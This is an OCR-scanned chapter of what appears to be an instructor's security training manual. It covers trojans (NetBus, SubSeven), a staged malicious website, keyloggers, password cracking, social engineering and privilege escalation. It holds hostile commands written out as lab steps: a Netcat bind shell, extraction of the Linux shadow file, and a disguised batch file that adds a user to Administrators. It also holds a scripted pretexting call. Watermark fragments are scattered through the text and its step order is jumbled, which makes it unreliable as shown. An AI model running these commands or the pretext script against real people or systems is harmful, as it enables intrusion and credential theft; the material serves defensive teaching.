10. Under Port, select a port that has a red circle with a yellow bar inside it. Under Severity, select Security Hole, and read the information displayed in the lower-right pane.
ru ct
PL
Under Subnet, select the target. Under Host, select the target. Under Port, select a port that has an exclamation point icon. Under Severity, select Security Warning, and read the information displayed in the lower-right pane.
or
When the scan has ended, view the results.
E
You might need to move the window up to reach the Start The Scan button.
Click the Start The Scan button. This scan will take a few minutes to complete, so please be patient.
Ed
iti
511
on
Setup: You are logged in to Linux as root, and the Nessus tool has been installed, and a nessus user created.
Topic 8E
Viruses, Worms, and Trojan Horses
Viruses, Worms, and Trojan Horses
Differentiating Between a Virus and a Worm
For this topic, we shall refer to the NSA denitions: A virus is a program that can infect other programs by modifying them to include a possibly evolved copy of itself.
ru ct st
Sending a virus or worm hidden in a Trojan Horse is one of the common ways to move a malicious program around the network.
In
DO
Outlook and Outlook Express became the method of choice for transmitting email viruses and worms over the last few years. Even casual users became aware of the names Melissa, Worm.Explore.Zip, BubbleBoy, ILoveYou, and so on. These simple worms would simply replicate themselves to the names and addresses in a users Address Book. This made the worm seem to come from a trusted source. It was due to this deception that these worms moved around networks so quickly.
NO
The vast majority of viruses used to be transmitted on oppy disks. But, thanks to the wonderful connectivity the Internet provides, the hacker does not need to be limited to getting a oppy disk into the network to do the job. A simple email will do. Even with all the publicity about opening attachments, spreading a virus or worm via an email attachment is still the most prevalent way to spread the program.
DU
PL
To put this in perspective, the names of these programs are appropriate. A virus requires a host while a worm does not. The worm is self-sufficient, and the virus is not. This distinction should make it clearly obvious that a worm is more dangerous to the network than a virus is.
or
IC
AT
A worm is an independent program that replicates from machine to machine across network connections, often clogging networks and information systems as it spreads.
Ed
In a similar vein to every computer criminal being lumped into the term hacker by the media, the same goes for the virus and worm (as well as the Trojan Horse, for that matter). So, virtually every incident with one of these programs will be referred to by the major media as a virus.
iti
on
When networks were not as big a part of business and everyday life as they are now, the concept of having a virus on the computer was unknown to most people. Today, there are millions and millions of people who are aware, in one way or another, that there are such things as computer viruses, and that they usually are bad. Although all these people are aware that such creatures exist, many network administrators cannot tell the difference between a virus and a worm.
The Trojan Horse

To complement the worm and virus discussion, one needs to discuss the Trojan Horse. Generally, a Trojan Horse is a program disguised as something else to allow for the installation and execution of one of the previously mentioned remote-control applications. The something else that intelligent hackers will often disguise their application as are small game programs. There is a reason for this. Most people cannot help but play a new, addictive, small, easy-to-play game. And, if it is simple and fun enough, it will circulate around an office very quickly. Perhaps the most infamous example of the Trojan Horse doing this very function is the game Whack-A-Mole. This game is, in fact, the Trojan Horse for NetBus. This program spread around many companies very quickly and is still in wide circulation. Most people will be very surprised when you inform them they have run a Trojan Horse program. Figure 8-22 shows some of the capabilities of NetBus. More about NetBus is included later in this topic.
Ed or ru ct In
DO
The SubSeven Trojan
Figure 8-22: An example of the control portion of Netbus version 1.70. Notice the different options on the various buttons. Another very smart Trojan Horse example is BoSniffer. This program is billed as a program to search out and clean Back Orice from a given system, when it is really Back Orice itself! So the net result is that running this program to remove Back Orice from a system actually installs it. Very clever. SubSeven is one the most widely used Trojan Horse programs available. Most hackers are aware of SubSeven and what it can do. In order for you to properly understand how to defend against this program, you must use it rsthand yourself.
st
NO
DU
PL
IC
AT
E
513
iti
on
Controlling the Target
A common way for SubSeven to be packaged is as a zip le containing three EXE les. These three les are the les used to run and manage the program. They are: Server.exe. This is the le that is installed on the victims computer.
EditServer.exe. This is the le that can be used to modify the available options that the server.exe can provide to the attack. Dene the port on the victim that SubSeven will use. Dene a password to protect the server program. Dene email options. These options include: Email every password to an attacker.
Some of the options that the EditServer.exe has are:
Email every pressed key to an email address.
Dene notication options. This can be most dangerous, as the notication options are: Email the attacker every time the server application runs. Notify the attacker via IRC when the server application runs.
or
DO NO
Rundll1.exe Systray.dll
ru ct
Task_Bar.exe FAVPNMCFEE.dll MVOKH_32.dll Nodll.exe Watching.dll
In addition to les added to the victim computer, several cong les may be modied as well. Examples of the modied les are: Win.inithis le will have a modication to the load= or run= statement. System.inithis le will have a modication to the shell= statement.
In
514
st
NetBus
Any discussion of Trojan Horse programs would be incomplete without examples and using NetBus. Most hackers are aware of NetBus and what it can do. In order for you to properly understand how to defend against this program, you must use it rsthand yourself. NetBus uses a two-part system to control a victim computer. There is a server program that must be executed on the target computer and a client program that the attacker will run to take control of the target.
DU
PL
IC
When SubSeven is installed on a computer, several les and Registry entries will be modied. Examples of the les that can be found on an infected computer are: Server.exe
AT
Notify the attacker via ICQ when the server application runs.
Ed
Email passwords for connections to the Internet to the attacker.
iti
on
Sub7.exe. This is the le used by the attacker to control the victims computer.
The server program can be renamed to anything the attacker wants to use, and often will be in order to better hide the application from detection. Common examples of the renamed server program could be Explore.exe or winsys32.exe, with the point being to make the application look like a system le. Different versions of NetBus have used different names for the server program. It has been called sysedit.exe, patch.exe, and server.exe. NetBus commonly uses port 12345 to connect, although newer releases allow for modication of the server port to use.
Regardless of the server name, it should be found in the Registry in the following location: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Run Several versions of NetBus are available on the Internet. In this section, we will discuss two different versions: one slightly older version, named NetBus 1.7, and a newer version, named NetBus Pro. Then, you will try out NetBus Pro in a hands-on activity.
or ru ct st
NetBus Pro
NetBus Pro is a more advanced version of NetBus than version 1.7. Many of the options are the same; however, there are differences, as you will see. Figure 8-24 shows some of the available options in NetBus Pro.
In
Figure 8-23: An example of available options for NetBus version 1.7.
DO
NO
T
DU
PL
IC
AT
NetBus 1.7 has a simple interface, with options such as opening and closing the CD-ROM or sending system messages. It also has the ability to provide more serious functions, such as shutting down the remote computer, viewing remote les, and sending the remote host to a URL. While the last option may not seem that critical, in an environment where Internet use is a strict and regulated policy, sending a remote computer to a known disallowed URL can have a serious impact.
Ed
NetBus 1.7
E
515
iti
on
Figure 8-24: Options available in NetBus Pro.
Ed
T DU PL IC
Using NetBus Pro
st
2.
In
Run the NetBus Pro application to open the control portion of the program. Note: Perform step 3 and step 4 only if you are designated as a target computer for this task.
3. 4.
Start NetBus Server, click Settings, and check Accept Connections. Under Visibility Of Server, select Only In Tasklist, and click OK.
516
DO
Provide students with the location of the NetBus Pro installation les.
ru ct
1.
Setup: You are logged on to Linux as root. Your instructor will assign each of you a role as an attacking computer or a target computer. For instance, if you were designated as Student_P earlier in the course, you might now be designated as an attacker for this task.
Note:Perform the following step on all student computers.
Note: Perform the following step only if you are designated as an attacking computer for this task.
NO
Boot to Windows 2000, and log on as the renamed Administrator account. Run the NetBus Pro setup program from the location provided by your instructor.
or
AT
TASK 8E-1
iti
on
Note: Perform step 5 through step 7 only if you are designated as an attacking computer. 5. In the NetBus Pro application, choose HostNew, and enter the IP address of the target computer. Click OK. The target should now be listed in the GUI as a destination. Right-click the target computer, and choose Connect. Once you are connected, try some of the different options, such as opening and closing the CD-ROM bay, capturing screen images, keyboard listening, and so forth. Note: Perform the rest of this task on all student computers. 8. 9.
6. 7.
Close all open windows, and reboot to Windows 2000 as the renamed Administrator account. Repeat this task, switching roles with your partner.
Topic 8F
Malicious Web Sites
Ed
T DU PL IC
In another lesson, you studied some of the techniques used by malicious Web sites to target ordinary users. Indeed, most attacks targeting ordinary users are rather unsophisticated and depend on computerized social engineering to get the job donethat is, getting the user to agree to something, such as downloading a le or clicking OK on some kind of executable, script, or batch le.
Implementing a Malicious Web Site
1. 2.
In
Setup: Observe as your instructor performs this task on the instructor machine.
If necessary, log on to your Windows 2000 Server as the renamed Administrator account. Navigate to the \085545\Data\HTML Files folder on the course CD.
DO
INSTRUCTOR TASK 8F-1
st
NO
In the following task, the instructor will set up a simple and innocent-looking Web site. The Web site proclaims to help a user verify his or her browsers security and offers various templates for the job. When the user clicks on a template, an error pops up telling the user that the required font was not found and offers a link to install the appropriate font with instructions to the user to click Open. When the user clicks on the link to the font, a popup shows up, the user clicks Open, theres a brief icker on the screen, and the user has just installed something malicious.
ru ct
or
AT
E
517
iti
on
If time permits, allow students 5 to 10 minutes to explore the NetBus options.
3. 4. 5. 6. 7. 8. 9.
Copy the Malweb subfolder onto your boot partition, in the Inetpub folder. Navigate to the \WINNT\Help\iishelp\common folder. Rename the 404b.htm le as 404b-old.htm. From the Inetpub\Malweb folder, copy the le 404b.htm to the WINNT\ Help\iishelp\common folder. Start Internet Services Manager.
Right-click Default Web Site, and choose Properties.
11. Click the Documents tab, then click Add.
12. For Add Default Document, enter malweb.htm, and click OK. 13. Select malweb.htm, and click the Up Arrow button until the le is at the top of the list.
Ed
T DU
10. Click the Home Directory tab. Browse to navigate to the Inetpub\ Malweb folder and click OK.
st
In
1. 2.
Start Internet Explorer. In the Address box, enter http://172.17.10.1. If the Content Advisor opens, enter the password 1234 and click OK to be able to view the site. You should be presented with a Web site indicating that your browser may not be secure and that you can evaluate your browsers security using a template.
518
DO
ru ct
TASK 8F-2
Falling Victim to a Malicious Web Site

Now, lets see what happens to the unsuspecting user when he or she happens upon the Malweb site that your instructor just implemented.
Visiting a Malicious Web Site
NO
PL
16. Right-click Default Web Site, and choose Start.
IC
15. If necessary, click OK to close the Inheritance Overrides information box.
or
14. Click OK.
AT
iti
In the left pane, expand the host, right-click Default Web Site, and choose Stop.
on
3. 4. 5. 6. 7.
Click any one of the templates (T1, T2, or T3) to display a page that indicates a required font was not found. Click the Back button, or click the link to go back to 172.17.10.1s home page.
Youre a savvy computer user, so place your mouse over the hyperlink in the sentence Please install the following font. At the bottom of your browser window, read the explanation for the link. It should say http://172.17.10.1/acrylic1.fnt, so its OKits only a font, not a malicious program. Your guard is down.
8.
9.
Close all open windows.
Topic 8G
Gaining Control Over the System
Ed
T DU PL IC
Open Windows Explorer, and navigate to the \085545\Data\HTML Files folder on your course CD. Examine the le acrylic1.fnt. Widen the File Name column to view the entire le name. This isnt really a font le, its a command script!
We will see how a system can be compromised by using Netcat.
TASK 8G-1
Using Netcat
st
Note:Perform step 1 through step 5 only if you are designated as a target computer. 1. 2. 3.
In
At the root of your boot partition, create a folder called nc. Copy the Netcat les from the location provided by your instructor to the new nc folder. If necessary, unzip the Netcat les.
Provide students with the location of the Netcat les.
DO
Setup: You are logged on to Windows 2000 as the renamed Administrator account. Your instructor will tell you whether you are to play the role of target computer or attacking computer.
ru ct
Netcat is a tool that can be used to connect to any computer it can listen on. This is part of the danger of using such a powerful tool. Sitting at a Windows 2000 computer, you can gain control of a Linux box, and sitting at a Linux computer, you can gain control of a Windows computer. All without having to provide any authentication!
NO
or
AT
E
519
iti
on
Now, read the instructions regarding fonts.
4. 5.
Open a Command Prompt, and switch to the nc directory. Enter nc -l -p 2020 -e cmd.exe. Note: Perform step 6 through step 11 only if you are designated as an attacking computer.
6. 7. 8. 9.
Log on to Linux as root. Open a Terminal Window. Enter nc target_IP_address 2020.
Observe that you now have what looks very much like a Windows command prompt. There is a very good reason for thatit is! Navigate around and see that you have full control, just as if you were sitting at the Windows machine with an open command prompt. Do not do anything that will disrupt the normal functions of the machine.
10. Enter exit to return to the Linux machine.
11. Reboot to Windows 2000 as the renamed Administrator account. Note: Perform the next step only if you are designated as a target computer. 12. Close all open windows.
If time permits and students are interested, have them switch roles and repeat this activity.
Ed
T DU
Keystroke and Password Attacks
st
520
In
DO
ru ct
Recording Keystrokes
Although the Trojan Horses have their place in attacking computers, they may be more than the attacker needs. Perhaps the only desire is to track the keys that are pressed on a target computer. If this is the case, Trojan Horses, even though they may have this ability, are too much.
The level of difficulty of detection can also be connected to the level of difficulty in placing the keystroke-logging application on the target. For example, the hardware keystroke loggers require physical access to the target computer. In the event that physical access is granted, these can be very hard to detect. But, before we get too deep into the world of hardware keylogging, lets look at a software keylogger.
NO
Keystroke logging can be one of the most dangerous attacks to deal with, since the program can run below the level of the operating system and, therefore, be close to impossible to detect. There are both hardware- and software-based implementations of keystroke logging.
PL
IC
Topic 8H
or
AT
iti
on
TASK 8H-1
Using Software Keystroke Logging
1. 2. 3. 4. 5. 6.
Create a new folder named Klogger. Copy the Klogger program from the location specied by your instructor to the new Klogger folder. Double-click Klogger to start the application. The only indication that something is happening is the display of the hourglass icon. Open Notepad, and type a short message to yourself. Then close Notepad; there is no need to save the le.
Switch to Explorer, open the Klogger folder, then open the klogger.txt le, and read its contents.
Close all open windows, reboot, and log on to Windows 2000 Server as the renamed Administrator account.
Ed
T DU PL IC
The smallest loggers are simple devices that are connected between the keyboard cable and the computer. Without physically looking, there is no chance to detect this application.
st
In
DO
We can now look at our rst hardware keystroke logger. Figure 8-25 shows a small hardware device that can be placed between the keyboard and the computer. Once the device has been installed, the attacker can log keystrokes and collect the data stored inside. The scary part about this kind of device is that it is completely independent of the operating system. A default installation using a device, such as those manufactured by KeyGhost, allows all captured keystrokes to be displayed in any text editor simply by entering the command vghostlog.
ru ct
In the event that even a higher level of stealth is required, the next step is to replace the keyboard altogether. By doing this, there is no clue that there is keystroke logging implemented on this machine. All of the logging is done via a chip embedded in the new keyboard. The attacker needs only to retrieve the keyboard and download the data from the chip.
NO
or
AT
Hardware Keyloggers
E
521
iti
on
Setup: You are logged on to Windows 2000 as the renamed Administrator account, and all windows have been closed.
Provide students with the location of the Klogger les.
Figure 8-25: A keyboard-logging device. (Picture from keyghost.com.)
Using a Keystroke-logging Keyboard

Objective: To observe the installation and use of a keystroke-logging keyboard. 1. Connect a keyboard that is designed to record keystrokes to your instructor machine. As shown in the graphic below, these types of keyboards usually dont look any different from a standard keyboard.
Ed
T DU
INSTRUCTOR TASK 8H-2
or
DO NO
522
In
st
ru ct
2.
Once the keyboard has been installed, show the class how it can be used to collect data, as well as how to retrieve the data stored in it.
PL
IC
AT
iti
on
Topic 8I
Cracking Encrypted Passwords
L0pht 2.5
or ru ct st
Figure 8-27 shows some of the options available in version 2.5 of L0pht.
Figure 8-26: An older version of L0pht, just after password information has been dumped from the Registry.
In
DO
NO
T
DU
PL
IC
AT
E
523
Lets take a look at one of the older versions of L0pht, version 2.5. In Figure 8-26, you can see that password information has been pulled from the Registry.
Ed
One of the most popular password-cracking tools is L0pht. This tool will download the passwords from a target computer, and then crack them. There are many version of L0pht, and the programmers have now teamed up with a legitimate security company to create commercial products to use. Their commercial products are used as legitimate administration tools to audit the strength of user passwords.
iti
Cracking Passwords with L0pht
on
If getting a physical key-logging device to the target for capturing passwords is not an option, and it often isnt, the next point a hacker must address is acquiring and cracking passwords. There are many tools available on the Internet for this task, but for class purposes, we will look at three of the most popular ones: L0pht, L0pht LC3, and John the Ripper.
Figure 8-27: Some of the cracking options available in L0pht 2.5.
Ed
T DU
And Figure 8-28 shows the successful cracking of passwords.
or
DO NO
524
In
st
ru ct
L0pht LC4
Now that you have seen an older version of L0pht, lets look at one of its related applications, L0phtCrack 4, or L0pht LC4. Figure 8-29 shows some of the options available in this application for gaining access to the passwords that you want to crack.
PL
Figure 8-28: Passwords are cracked!
IC
AT
iti
on
or ru ct st
Figure 8-31 shows L0pht LC4 in action. Figure 8-30: L0phtCrack LC4 auditing and password strength options.
In
DO
NO
T
DU
PL
IC
AT
Figure 8-30 shows the auditing and password-strength options.
E
525
Figure 8-29: Options for getting encrypted passwords in L0phtCrack LC4.
Ed
iti
on
Ed
Figure 8-31: Password audit in progress.
If time is an issue, you can assign one-half of the students to do the L0pht LC4 (Windows 2000) exercise, and the remaining one-half of the students to do the John the Ripper (Linux) exercise, so that everyone can see the differences between the password crackers without having to use both in class.
ru ct
1. 2. 3. 4. 5. b. c. d. 6. 7.
Create a folder named LC4 on your hard drive.
Run LC4setup, accepting all defaults during the installation routine.
st
In
Create four new user accounts, assigning passwords as follows: a. One password that is blank (null). One password that is the same as the user name. One password that contains only numbers. One password that contains only random letters.
Start the L0pht LC4 application. Click Trial. The LC4 Wizard opens.
526
DO
Provide students with the location of the LC4 installation les.
Open the Custom_GPO you created earlier in the course, and disable all password policies. Close the Custom_GPO when you are nished.
NO
Copy the LC4 setup program from the location provided by your instructor to the new LC4 folder.
DU
Setup: You are logged on to Windows 2000 Server as the renamed Administrator account.
PL
Using L0pht LC4
IC
TASK 8I-1
or
AT
iti
on
8. 9.
Click Next twice, then click Custom, and click Custom Options. Uncheck Perform A Brute Force Attack On The Passwords, and click OK.
11. While the audit is running, open the Task Manager on your computer, and note your current processor usage. 12. When the Auditing Session Complete message is displayed, click OK. 13. Review the results. At least some of the four easy passwords you assigned during this task should be cracked. The more complex passwords that you created earlier in the course might be only partially cracked. 14. Close all open windows. You do not need to save changes.
Cracking Passwords with John the Ripper
or
DO NO
TASK 8I-2
Using John the Ripper
Setup: You are logged on to Windows 2000 as the renamed Administrator account. 1. 2. 3. Log in to Linux as root.
In
In the /root directory, create a new directory called JohnTR. Copy the John the Ripper installation les from the location provided by your instructor to the new JohnTR directory. In most cases, you will be provided with a compressed le called john-1.6.tar.gz, but if you are provided with a directory called john-1.6, you can skip the next step.
st
DU
John the Ripper is among the newer password crackers available, and has gained great notoriety as it is very fast, and can handle several password hashing algorithms. We will now look at using John the Ripper to crack passwords in Linux (although a version has been ported to NT).
ru ct
PL
Provide students with the location of the John the Ripper installation les.
These programs can use much of a computers resources, so running them on a production machine is not a good idea.
IC
Two common password crackers are Crack and John the Ripper. In both cases, it is required to gain access to the password le, then have that le processed by the cracking program.
AT
E
527
The passwords used in any operating system are critical to protect, and Linux is no different in this regard. Just as there are methods to crack the passwords in Windows NT or Windows 2000, there are methods to crack the passwords in Linux.
Ed
iti
on
10. Click Next twice, and then click Finish. The password audit starts automatically.
4.
If necessary, open a Terminal Window, switch to the JohnTR directory, and unzip the john-1.6tar.gz le by using the gzip -d john-1.6.tar.gz command. This command will unzip the les to a le called john-1.6.tar. If necessary, untar the john-1.6.tar le by using the tar -xf john-1.6.tar command. This command will untar the le into a directory called john-1.6.
5. 6. 7. 8.
Your instructor can help you determine if you have a matching system type.
Switch to the john-1.6 directory, and list its contents. This directory contains another directory that contains the source le. Switch to the src directory to prepare for the installation.
To start the actual installation, enter make to display a list of system types. If your system type is matched, make a note of it. If you have a matching system type, enter make system_type, where system_type is the actual system type of your computer. If you do not have a matching system type, enter make generic. This command will start the installation. When it is nished, you will be ready to run the John the Ripper application.
ru ct
c. d.
One password that contains only numbers.
We now need to copy the password directories to a text le rst so that we can safely crack them.
st
12. Enter chmod 600 pwd.txt. We are now ready to let John do his work and crack our passwords. 13. Enter ./john pwd.txt.
In
14. Let the program run, watching for output on your screen. At least some of the passwords should be cracked.
15. When you are ready to move on, close all open windows.
528
DO
NO
11. Enter ./unshadow /etc/passwd /etc/shadow > pwd.txt. Next, we need to change permissions on the text le so that John can work with it.
DU
One password that contains only random letters.
PL
b.
One password that is the same as the user name.
IC
10. In a Terminal Window, create four new user accounts, assigning passwords as follows: a. One password that is blank (null).
or
AT
9.
To get ready to run the application, enter cd .. to move up one directory, then enter cd run to move into the run directory.
Ed
iti
on
Topic 8J
Revealing Hidden Passwords
The programs in Windows generally use the asterisks only to mask the true password below. Imagine removing a tablecloth to see the surface of the table below. The passwords are there; it is only a matter of removing the covering. The tool we will use to do this is called Snadboys Revelation. Figure 8-32 and Figure 8-33 show this tool in action. In Figure 8-32, you can see a users password being masked by the asterisks.
Ed or ru ct
Figure 8-32: Creating a user and entering a password that is hidden from view by asterisks.
st
In
DO
NO
T
In Figure 8-33, Snadboys Revelation shows the unmasked password.
DU
PL
IC
AT
E
529
iti
on
Using programs such as L0pht is not the only way of identifying passwords of users and applications on a system. Another method is to try to reveal the passwords beneath the asterisks in Windows.
TASK 8J-1
1. 2. 3.
Provide students with the location of the Snadboy installation les.
ru ct
4. 5. 6. 7. 8. 9.
Run the installation program, accepting all defaults.
st
In
For Display Name, enter test, and for Email Address, enter test@localhost and click Next.
10. For the POP3 and SMTP Server Names, enter localhost and click Next. 11. Leave the Account Name as displayed, enter the password 1qaz!QAZ and leave the Wizard open. 12. Move the Snadboy window to the upper-right corner of your screen.
530
DO
Specify that you want to connect through a LAN, and click Next three times.
NO
From the Start menu, choose ProgramsAccessoriesCommunications Internet Connection Wizard. Specify that you want to set up an Internet connection manually, and click Next.
Run Snadboys Revelation.
DU
If necessary, unzip the le, and extract it to the Snadboy folder.
PL
Copy the Snadboy installation program from the location provided by your instructor to the new Snadboy folder.
IC
Create a new folder on your boot partition named Snadboy.
or
Log on to Windows 2000 as the renamed Administrator account.
AT
Revealing Hidden Passwords
Ed
Figure 8-33: Place the crosshairs over the asterisks, and Snadboys Revelation will reveal the password for this user.
iti
on
13. Move the Wizard window to the lower-left corner of your screen. 14. Observe the Wizard window. The password for the user named test is masked by a series of asterisks. 15. Switch to the Snadboy window, and drag the target-shaped cursor over the masked password, and release the mouse button. 16. Observe the Snadboy window. The masked password is revealed. 17. Close all open windows.
Social Engineering
Social engineering takes advantage of some inherent human characteristics. Very good hackers, in general, have quite a solid grasp of human psychology. This is an absolute must for the hacker to be able to perform social engineering well. Understanding how people generally react to given predictable situations allows hackers to use this knowledge to elicit the needed responses.
Ed
T DU PL IC
st
In
As the hacker walks the user through a series of questions and scenarios, they are building a relationship with the user. Soon enough, the user will give enough information to allow the hacker to simply walk into the network at will. This method is perhaps the most common social engineering technique, and it is used daily!
DO
Lets look at the rst method: trying to take advantage of the users of a network. In this scenario, the hacker may call the front desk (any user would normally work, the front desk is just one example) in the guise of being a network administrator of the network. Having learned the name of the network administrator by checking domain name registrations, the hacker calls as the network administrator to the user, requesting information. Many network users will simply respond to what the network administrator wants and needs right away, because they believe that this is the person who controls their network usage. This is one of the key psychological elements that the hacker will exploit.
ru ct
With just the information gained from network reconnaissance, there are several different avenues open to hackers. The two primary methods are to try to take advantage of either the users of the network or the Help Desk of the network. Both methods require roughly the same set of skills from the hacker, so both are used widely. Additionally, for this to be successful, the company needs to be big enough that most employees have never heard of nor seen most of the other employees.
NO
or
Most social engineering begins with the information learned during the networkreconnaissance and target-acquisition phases of the attack. This information includes phone and fax numbers, IP addresses, physical addresses, DNS names and addresses, router names and addresses, email server names and addresses, billing contact names and email addresses, and so forth. This information provides a good social engineer with most of what is required to begin the attack.
AT
E
531
iti
Other Attacks
Topic 8K
on
A common way to get the name of this high-level person is for the hacker to call to set up the fake meeting. The hacker calls reception, and says Hi, this is John from XYZ. My boss asked me to set up a meeting with your HR Director, but she was leaving the office when she asked me. What is the HR Directors name again? You get the idea. Once the higher-ups name is known, the hacker can call the Help Desk and begin demanding something like, My email is not working, reset my password right now, and how do I set it up again? Instant access to the internal email server!
or
DO NO
ru ct
1.
Discussing Social Engineering Examples

Discuss and dene examples of how social engineering can be used by an attacker to gain knowledge about a potential target.
Topic 8L
In
532
st
Case Study: Social Engineering

Target: Good morning, XYZ Corp, how may I direct your call? Hacker, with just a bit of authority in the voice: Good morning, actually I called to speak with you. This is Warren from the Networking Department. Who is this again, just so Im sure I have the right person? Target: This is John, is there something wrong?
DU
PL
TASK 8K-1
IC
AT
In any case, whether the target is a user, a Help Desk worker, or corporate clients of an ISP, the general method hackers use is the sameuse the human psyche to their advantage.
Ed
There are no restrictions on social engineering, which is why it is so effective. The options for a hacker to use social engineering are almost limitlessthe only restriction is the overall creativity of the hacker. Perhaps a hacker takes a parttime job at a local ISP for a while to gain intelligence. The entire reason they may be there is to gain a different level of access to information about potential targets.
iti
on
The other method is for the hacker to target the Help Desk for social engineering. This process usually requires a bit more acting ability and a strong personality to pull off. It also requires a decent amount of information about the corporate management of the given target. A name of a person quite high up on the corporate ladder is required. Not high enough so everyone in the company instantly recognizes the name or the voice, but high enough in the structure so that people might feel fear by association of the title.
Hacker grins in response to the question, then: No, John, not right now, but we are experiencing some intermittent problems. I just stepped out of a meeting with Kevin, and we decided we needed to ask you and a few other users a few questions. Theyll be straightforward, not too technical, so dont worry. OK, ready? (Hacker uses a real employee name, gained during network reconnaissance, to help build the image.) Target: Um, sure I guess. Im not that great with the computer in that way. I mean I use Office really well, and stuff, but.... Hacker: Youll be ne, John. Here we go. The rst thing I need you to do is open the command prompt. Go to your Run line and type command. Hacker waits. Target: Where do I type Run? Hacker sighs a bit, to pressure the Target, then grins even wider.
Target: OK, its open now. Now what?
Hacker waits, then records Targets responses.
Target: Uh, OK I got it. This is easy!
Hacker waits again, and records Targets response. Target: OK, wow, thats a lot of stuff, huh?
st
Hacker waits, then records Targets response. Target: What is all this stuff anyway?
Hacker: These are the numbers I use to make sure you stay connected to the Internet, and that your email still functions right. By the way, have you had any email problems today? Target: No, not really. At least I dont think so.
In
DO
Hacker: Yes, it can be. OK, we just have a few more. Type in nbtstat, space, minus n. Then tell me what it says to the left of the word group.
NO
Hacker: Yes, it is, youre doing great. Now, tell me what it says to the right of DHCP Enabled, Host Name, Primary DNS Suffix, and DNS Servers....
DU
Hacker: OK, thanks, now I want you to type in something similar, type Ipcong, space, forward slash all.
ru ct
PL
IC
Hacker: Tell me what it says to the right of where it says IP Address, and where it says Subnet Mask and Default Gateway.
or
Target: How do you spell that again? Oh, never mindI gured it out. OK, what do you want from this?
AT
E
533
Hacker: Good, the rst thing I need you to type is called Ipcong, just type in the letters I-p-c-o-n-f-i-g, then Ill ask you a few more questions from that screen.
Ed
Hacker: No, you dont type Run. You see the Start button in the lower left-hand corner? Good, click it and go up to where it says Run. See it now? OK, great. Youre doing ne. OK, now type Command. Let me know when the black window opens up on your screen.
iti
on
Hacker records Targets response. Target: Phew, all right is that it?
Hacker: Almost. Im sending you an email conguration program right now.... Hang on.... Hacker pauses dramatically, then: OK, you should get it now. Target: OK, what is this?
Target: OK, hang on.... It says email server conguration OK, Client conguration OK. So, thats good right? Hacker: That is absolutely perfect. I think you may have been one of the lucky ones today. Listen, I have something fun to send you also. Kind of a time killer, just a little fun game. Do you want that? If you dont want it, thats OK. Target: Of course, I love those stupid games. What is it?
Ed
T DU
Hacker: Go ahead and double-click that, and tell me what the diagnostic window says when it is done.
st
534
In
DO
ru ct
Hacker: Yep, seems all good. Have a great day! Target: Thanks, you too. Bye.
NO
Now, please dont laugh. Although this scenario illustrates an extreme case, it is not that far off. In this case, the hacker happened to get lucky and get someone on the other line that t the need just right. Of course, this will not happen often, but odds are that it will happen. Think about what this hacker was able to learn, and do, in just a few short minutes.
PL
Target: Really, well thanks a lot Warren, I really have to get back to work. So, everything seems ok?
IC
Hacker: Its a fun, addictive game called Whack-a-Troll. If you like it, go ahead and send it to your friends, I wont mention it to anyone. We all play it over here, so there is no reason you guys shouldnt get it, you know?
or
AT
iti
on
Hacker: Thats good, I wasnt sure if your computer was one of the ones that had a problem yet or not. Ill send you something in just a minute to check your email conguration. Now one more thing to type in while you are where you are right now. Please type netstat, space, minus a. There might be a bigger list here. The column to the right, where it says State. I need you to nd the ones that say listening, and tell me what is to the left, under Proto...Yes, there could be quite a few.
TASK 8L-1
Reviewing the Social Engineering Case Study
1. What was this attacker able to learn during the social engineering? The hacker got all of the internal IP details, an internal domain name, the company DNS server addresses, and the listening ports of this computer! Then, as if that was not enough, the hacker loaded a Trojan Horse in a friendly email sent from a fake address. And, the hacker took the next step of trying to infect the network with the Trojan Horse. Again, all in a few minutes. Only a bit more work, and this attacker will end up with complete control of the entire network!
Topic 8M
Gaining Unauthorized Access
or
DO NO
ru ct
Privilege Escalation
Consider the following situation: On a Windows 2000 network, the user WandaB has regular user privileges. She decides that she wants to be a network administrator. Wanda creates the following simple program in Notepad, and saves it with a name such as regedit.bat.
net localgroup administrators WandaB /add start regeditr.exe exit
The next time that anyone with administrative privileges tries to edit the Registry of the compromised server by opening the Run dialog box and entering regedit, Wandas batch le will runchanging her group membership to Administrators and granting her the privileges of that group. The administrator who ran Regedit will probably not be aware that he or she has done anything unusual, because Wandas batch le calls on the renamed Registry Editor.
In
Wanda then arranges (probably by some devious means) for someone who already has administrative access to place the le in the %systemroot% folder of a Windows 2000 Server, rename the original le regedit.exe as regeditr.exe, and reboot the server.
st
DU
PL
This section focuses on very simple programming techniques that can be a threat. Obviously, an attacker would not already have access to the machine as an administrator, but this is to show what could be programmed into an attack, which would then be sent to the administrator, in the hopes that he or she would execute it.
IC
AT
Remember that many people consider the number one threat to network security to be the employees themselves. If the employee has a bit of programming skill, then the threat can become even more difficult.
Although many of these hacker tools are effective, they may require access that the attacker cannot get from the Internet to run them. Or, perhaps the antivirus software will detect them, as may be the case for well-known programs like NetBus and SubSeven.
Ed
iti
on
Files in Windows systems are executed in the following order: .com, .exe, and then .bat. This is a simple example of how a user can take advantage of knowing the basics of Windows and programming. The only restriction on how far this can go is the imagination of the user.
Gaining Unauthorized Rights

Now, assume a curious user exists in your Windows NT network (remember that audits have placed over 70 percent of all network abuse on the shoulders of internal users). This user has normal user rights, but that may not be enoughhe or she may want to be a local administrator for his or her own machine. If the system has not been properly patched and updated, this could be easier than you think. There is a utility called GetAdmin that can give a user administrator-level rights on a machine running Windows NT 4.0 Server, if that server does not have any Service Packs after SP 3 installed. Service Pack 4 actually xed the security hole that allowed GetAdmin to work. The GetAdmin utility can be found at http:// packetstormsecurity.org, and there are other similar utilities that can penetrate a server and assign administrative rights to ordinary users. These utilities can be found on various Web sites such as the one listed here for GetAdmin.
Deleting or Renaming the Security Accounts Manager (SAM)

If students are interested, and you have a machine that has only Windows NT Server (without SP 6a) installed, you can demonstrate how GetAdmin works.
or
DO NO
ru ct
Windows will also create new event and log les if the old ones cannot be found.
In
536
st
